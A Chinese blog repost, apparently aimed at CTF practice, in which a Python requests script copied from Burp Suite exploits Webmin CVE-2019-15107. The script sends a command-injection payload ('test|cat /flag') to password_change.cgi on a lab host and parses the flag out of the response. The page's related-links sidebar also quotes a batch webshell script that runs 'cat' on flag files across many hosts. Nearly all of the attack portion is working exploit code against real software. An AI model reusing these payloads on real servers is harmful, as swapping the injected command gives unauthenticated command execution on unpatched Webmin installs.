python操作burp的requests插件实现批量化获取flag(webmin漏洞CVE-2019-15107)

最新推荐文章于 2023-05-29 00:09:52 发布
最新推荐文章于 2023-05-29 00:09:52 发布
阅读量1k 收藏 1
点赞数
文章标签: python
原文链接:http://www.cnblogs.com/R1card0/p/11406011.html
版权

webmin漏洞CVE-2019-15107 漏洞原理:

使用burpsuit的右键copy as requests

burp0_url = "https://192.168.184.128:10000/password_change.cgi"
burp0_cookies = {"redirect": "1", "testing": "1", "sid": "x", "sessiontest": "1"}
burp0_headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Connection": "close", "Referer": "https://192.168.184.128:10000/session_login.cgi", "Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {"user": "rootxx", "pam": '', "expired": "2", "old": "test|cat /flag", "new1": "test2", "new2": "test2"}
flag = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, verify=False)
需要处理一下post数据的返回编码,和https的交互问题,需要安装一个openssl的python库和引用库模块,将warning忽略掉
代码如下
 1 import requests
 2 requests.packages.urllib3.disable_warnings()
 3 
 4 
 5 burp0_url = "https://192.168.184.128:10000/password_change.cgi"
 6 burp0_cookies = {"redirect": "1", "testing": "1", "sid": "x", "sessiontest": "1"}
 7 burp0_headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Connection": "close", "Referer": "https://192.168.184.128:10000/session_login.cgi", "Content-Type": "application/x-www-form-urlencoded"}
 8 burp0_data = {"user": "rootxx", "pam": '', "expired": "2", "old": "test|cat /flag", "new1": "test2", "new2": "test2"}
 9 flag = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, verify=False)
10 
11 # with open("./1.txt", "w") as f:
12 #     print(type(flag.content.decode("gbk")))
13 #     f.write(flag.content.decode("gbk"))
14 findflag = flag.content.decode("gbk")
15 result = "flag" in findflag
16 indexstart = findflag.find("flag")
17 print(findflag[indexstart:indexstart+11])
18 # print(result)

 




转载于:https://www.cnblogs.com/R1card0/p/11406011.html

a167817
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
自动提交flag到指定服务器python脚本
05-12
自动从txt读取flag并提交指定平台python脚本,AWD比赛专用,可以自定义内容,批量提交等,确保速度
BurpSuite件开发指南之 Python
weixin_34324081的博客
03-08 914
Her0in · 2016/06/06 11:41此文接着 《BurpSuite件开发指南之 Java 篇》 。在此篇中将会介绍如何使用 Python编程语言 开发 BurpSuite 的件。《BurpSuite 件开发指南》系列文章如下:《BurpSuite件开发指南之 API 篇》《BurpSuite件开发指南之 Java 篇》《BurpSuite件开发指南之 Python 篇》注...
awd-python批量flag批量提交
weixin_46079186的博客
06-26 5336
代码仅供参考 import requests import re data = { '123':"system('cat+/home/ctf/flag');" # 一句话木马 } list = [] def shell(): for i in range(1,255): try: io = requests.get("http://192-168-1-" + str(i) + ".awd.bugku.cn/e/search/result/
Burp Suite入侵者(Intruder)模块使用详解
i8o6o6的博客
12-03 5965
Burp Intruder是用来自动攻击Web应用程序的工具,且攻击可配置。 能暴力猜测Web目录、主动利用盲SQL注入漏洞等。 攻击原理:从别的模块接收HTTP请求,每次攻击必须指定一到多组payload和payload在请求中的的位置,攻击时发送修改过的每个版本的请求并分析应用程序的响应。 Target 此选项用来配置目标服务器信息 Host:目标服务器的IP地址或主机名 Port:服务的端口号,80端口对应web服务 Use HTTPS:是否应该使用TLS https相较于htt
使用Burp Suite的Intruder模块发现敏感目录
qq_71995567的博客
05-29 443
Intruder模块是一个定制的高度可配置的工具,对web应用程序进行自动攻击,如:枚举标识符,收集有用的数据,以及使用fuzzing 技术探测常规漏洞。 此选项卡用于为攻击配置目标服务器的详细信息。所需选项包括: Host(主机):这是目标服务器的IP地址或主机名。 Port(端口):这是http/s服务的端口号。 Use HTTPS:这指定是否应使用ssl配置这些详细信息的最简单方法是选择要在Burp Suite中攻击任何地方的请求,并在上下文菜单上选择“Send to Intruder”选项。这将
CTF比赛中使用Python通过Mysql漏洞获取FLAG
单核CPU的小朋友的博客
03-21 1210
#!/usr/bin/env python import MySQLdb def Mysql_Inject(ip,flag): db = MySQLdb.connect("127.0.0.1","root","123456","python") cursor = db.cursor() try: query = "insert into py values(\"%s\",\"%s\");"%(ip,flag) cursor.execute(query
CVE-2018-9995_dvr_credentials.rar_CVE-2018_FXG_burp CVE-2018-999
09-20
[Tool] show DVR Credentiales 通过CVE-2018-9995漏洞获取部分暴露于网络的监控设备权限,与Shodan配合食用更佳。
burp-unauth-checker:burpsuite扩展程序,用于检查未经授权的漏洞
04-15
burp-unauth-checker概述自动检测未授权访问漏洞关于该件的实现细节,参考快速开始使用时需要勾选launchBurpUnauthChecker,建议在测试需要授权访问的功能时才开启(如网站后台)authParams.cfg:存储授权参数,...
Burpsuite-UAScan:burpsuite件:被动进行未授权访问扫描
05-23
Burpsuite件:被动方式进行未授权访问漏洞(越权)的扫描 被动扫描经过Burpsuite的每一个请求 通过修改Cookie头重新访问判断是否存在未授权访问(越权)问题 如果扫描到未授权访问的URL会显示到空白区域中 采用...
burp-clj:clojure实现burp件,提供clj脚本加载环境
05-11
burp-clj为burp提供clojure件支持,提供加载clojure脚本文件的功能Usageburp加载件后,在Clojure Plugin页面下添加Script Source,比如:然后点Reload Scripts!加载这个目录下的所有clj文件,支持git url和本地...
burp-copy-request-response:Burp扩展名,用于快速复制请求响应数据
05-28
打p扩展名:复制请求和响应 描述 编写良好的报告是渗透测试/安全评估的关键,因为这是交付给客户的最终结果。 应该以某种方式描述漏洞,以便客户可以理解并重现该问题。 对于Web应用程序最严格的测试,最好的方法通常是显示HTTP请求和响应来解释问题。 这个Burp Suite扩展“复制请求和响应”可以在报告过程中为您提供帮助。 从Burp复制请求/响应时,工作流程通常是这样的: 选择要求 复制到剪贴板 切换到报告工具(Word,Markdown,Web App,LaTeX编辑器, $YOUNAMEIT ) 粘贴请求 切换回Burp 选择响应(如果主体太大而您只想显示该问题,则仅选择一部分) 复制到剪贴板 切换回报告 再次粘贴 添加上下文以说明请求/响应 复制请求和响应Burp Suite扩展添加了新的上下文菜单项,这些菜单项可用于简单地将请求和响应从所选消息复制到剪贴板。 工作流程
Python-一个Burpsuite件用于检测隐藏的XSS
08-10
一个Burpsuite件,用于检测隐藏的XSS
BurpSuite件分享
混子
08-26 3520
之前总认为挖洞细就中了,但在前段时间人麻了,去测站,把功能点测完以为结束了,因为这几年甲方安全意识强,还有一些安全设备,再加上人家防范的意识也强,就感觉不会出现spring boot未授权、shiro默认密钥等这种比较低级的事情,但事实总是打脸的措不及防,测完发现甲方爸爸找上门了,说人家测拿到权限了,你是不是不行,在这里小弟建议各位哥哥留意一下那些主动检测到件,说不定弹了你不知道,所以这篇文章主角是件。......
Burp---爆破
文轩
11-02 954
下面对Burp的使用贴出了,本人学习的博客,其实挺简单的就不详细说了。 # 使用 一个例题:点击图片 打开页面: 点击登陆,提示用户名为admin进入check.php页面 然后查看源代码 提示需要一个字典 那就需要爆破登陆这个页面。用 Burp 《下面聊安装》 在上面完成之后开始爆破 先设置代理服务器:360为例:工具->Internet选项->...
渗透测试技巧:python+burp快速编写网站测试脚本
u013797594的博客
08-04 3189
渗透测试技巧:python+burp快速编写网站测试脚本 简介 在进行WEB渗透测试过程中,经常遇到现有的脚本不够用的情况,这时候如何快速编写WEB网站的测试脚本呢?答案就是神器python+burp。 环境准备 python3 burpsuit 打包了一个:链接:https://pan.baidu.com/s/1nnyRiAVKi2WszOXG7N0CiA 提取码:tkq7 件安装 burpsuit直接它的在商店安装件Copy As Python-Requests 抓包的时候,右键选择Copy as
关于实验http://106.52.39.144 用御剑和burp suite 来去找到flag操作步骤及截图
weixin_56513549的博客
01-22 728
本实验一共有两个flag (1)第一个 直接f12即可看到给的字典,通过页面直接搜索 (2)第二个 将所给字典以文本的形式保存到御剑扫描配置文件夹下 使用所给字典进行扫描发现敏感文件 直接双击点开即可进入,发现下载了www文件,将文件解压得到第二个flag 实验结束 ...
http://106.52.39.144:88 找到flag
qq_53701412的博客
02-01 2890
flag
PHP与JSON的一些常用操作
HelloWorld
09-30 1906
PHP把数据写入JSON文件 <?php // 生成一个PHP数组 $data = array (); $data ["fruit"] = "apple" ; $data ["animal"] = "tiget"; // 把PHP数组转成JSON字符串,写入文件 $json_string = json_encode( $data ); ?> PHP读取JSON数据? <?php // 从文件中读取数据到PHP变量 $str = file_get_contents ( 'one
使用Burp Suite和Python进行自动漏洞挖掘
鹅子鱼的博客:很菜但是很好学的小菜鸟
05-05 1794
最近一直在研究如何解放双手(好歹咱也做过两年程序员) 进行自动挖掘(虽然目前能力还欠缺)简单的解放一下双手还是可以的 下面将利用Burppython实现自动
python-burpsuite
最新发布
09-27
python-burpsuite是Burp Suite的一个Python件,它允许用户使用Python语言编写自定义件来扩展Burp Suite的功能。与Java和Ruby件类似,开发者可以使用Python实现他们想要的功能。要使用python-burpsuite件,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值